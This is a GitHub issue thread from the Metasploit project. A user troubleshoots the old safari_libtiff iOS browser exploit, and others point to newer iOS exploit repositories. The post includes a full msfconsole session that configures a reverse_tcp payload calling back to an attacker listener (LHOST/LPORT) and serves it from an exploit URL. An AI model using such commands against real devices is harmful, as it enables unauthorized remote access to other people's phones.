Metasploit-framework: ios exploit safari_libtiff... link does not open in safari browser. session is not created

Created on 11 Mar 2018  ·  6 Comments  ·  Source: rapid7/metasploit-framework

Steps to reproduce

I have been using "exploit/apple_ios/browser/safari_libtiff"
and payload "osx/armle/execute/reverse_tcp"

I have been using my internal IP... I tried to use an ngrok external IP once, then the link was successfully opened and the session was created, but the handler could not connect, and the session was also immediately closed with an error.

This is what I have been doing

msf > use exploit/apple_ios/browser/safari_libtiff
msf exploit(safari_libtiff) > set URIPATH /ipwn
URIPATH => /ipwn
msf exploit(safari_libtiff) > set PAYLOAD osx/armle/execute/reverse_tcp
PAYLOAD => osx/armle/execute/reverse_tcp
msf exploit(safari_libtiff) > set LHOST xxx.xxx.x.xxx
LHOST => xxx.xxx.x.xxx
msf exploit(safari_libtiff) > set LPORT 4444
LPORT => 4444
msf exploit(safari_libtiff) > exploit
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ipwn
[*] Local IP: http://xxxx.xxx.x.xxx:8080/ipwn
[*] Server started.
[*] Exploit running as background job.
msf exploit(safari_libtiff) >

Expected behavior

When the URL is opened in the Safari browser, it should create a session that I can interact with.

Current behavior

What happens instead is that the link cannot be opened in the Safari browser on my iPhone and the session is therefore not created.

System stuff

Metasploit version 4.16.42 -dev

OS

Kali Linux

Stale bug

All 6 comments

Which device are you testing with? This exploit is for iOS 1.1.1 (which is very old!).
Do you see [*] xxx.xxx.x.xxx safari_libtiff - Sending exploit in the output? If not, it sounds like a networking issue.

@timwr Thank you. I've been testing it on iOS 7.1.2 :( . It does show sending exploit

The exploit you're testing with is for iOS 1.1.1, so it will not work on 7.1.2.
I have an iPhone 4 on 7.1.2 but I'm yet to find a Safari exploit that works. Which model do you have?
There is https://github.com/feliam/CVE-2014-4377/blob/master/mkCrash.py by @feliam
In theory this exploit: https://github.com/rapid7/metasploit-framework/pull/9528 might work also (it's for < 9.3.5) but it's not working currently.
https://jailbreak.me/ is using the same exploit but it's only for 32-bit 9.1 - 9.3.4 and I can't find a vulnerable device.
@tihmstar also has a nice blog about it here: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
Any suggestions would be much appreciated.

Please, tell me! How is it possible? I have an iPhone 4s and also an iPad 2. Till this moment I cannot get any vulnerability

Does it work with jailbroken iOS 13.4? If not, what does work with it?

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It's been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
